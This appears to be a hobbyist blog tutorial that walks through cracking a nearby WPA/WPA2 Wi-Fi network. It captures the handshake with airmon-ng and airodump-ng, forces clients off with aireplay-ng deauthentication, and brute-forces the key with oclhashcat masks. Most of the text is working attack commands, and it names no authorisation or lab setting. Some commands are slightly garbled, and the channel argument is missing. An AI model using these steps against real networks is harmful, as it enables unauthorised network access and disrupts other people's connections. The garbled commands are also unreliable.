There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we'll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)
- Aircrack-ng
- Oclhashcat
This guide assumes the following things:
- wlan0 is a WiFi interface
- mon0 is the interface in monitor mode
- <channel> refers to the channel the target Wi-Fi is operating on
- 00:2d:37:4b:e4:d5 is the MAC address of target AP (access point) (not real)
- cc:cc:4e:5b:d7:3d is MAC of client associated with the target AP (not real)
- # (hash symbol) is used to mark start of a command
Steps:
Open up a terminalStart by putting Wi-Fi interface in monitor mode
#airmon-ng start wlan0
This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.Then, start sniffing air for all AP's in the area.
#airodump-ng mon0
This will give you information about all AP's in your vicinity. Select one with highest strength and focus on that one.Press Ctrl+C to stop above command and type:
#airodump-ng –c --bssid 00:2d:37:4b:e4:d5 –w mon0
This command only sniffs for one specific AP:-c tells which channel to sniff-bssid is the MAC of AP to target-w tell to write a file to capture handshake (for later use in recovering password)mon0 is the monitor interfaceNotice the MAC address of clients shown in the terminal; we'll need it for the next step. Now, open a second terminal and type:
#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0
This command says to de-authenticate a client from its AP-0 tell how many time to send deauth signal (in this case 5 times)-a tell the MAC of AP-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).Once handshake file is captured and written (in format file.cap), clean the file using the following command:
#wpaclean clean_file.cap captured.cap
Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). Now, prepare the file for hashcat by:
#aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) Now, begin the cracking process by:
#oclhashcat –m 2500 –a 3 --session=my_session /for_cat.hccap /mymask.hcmask
Here, –m 2500 tell to crack WPA/WPA2-a 3 tells to use brute-force or mask based brute force (more on it later)-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)/for_cat.hccap is path to your captured and cleaned prepared hashcat file/mymask.hccap is path to the mask fileOnce it's done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) NOTES ON HASHCAT MASKSThe mask can take following format:
- ?u for upper case letters (ABC…)
- ?l for lower case letters (abc…)
- ?d for numbers
- ?s for symbols (ASCII only I think)
- ?a use all of the above characters
Thus to create a mask type in a black file:
- ?d?d?d?d?d?d?d?d for a 8 digit password
That’s it for this tutorial. Honorable mention goes to blackMORE Ops.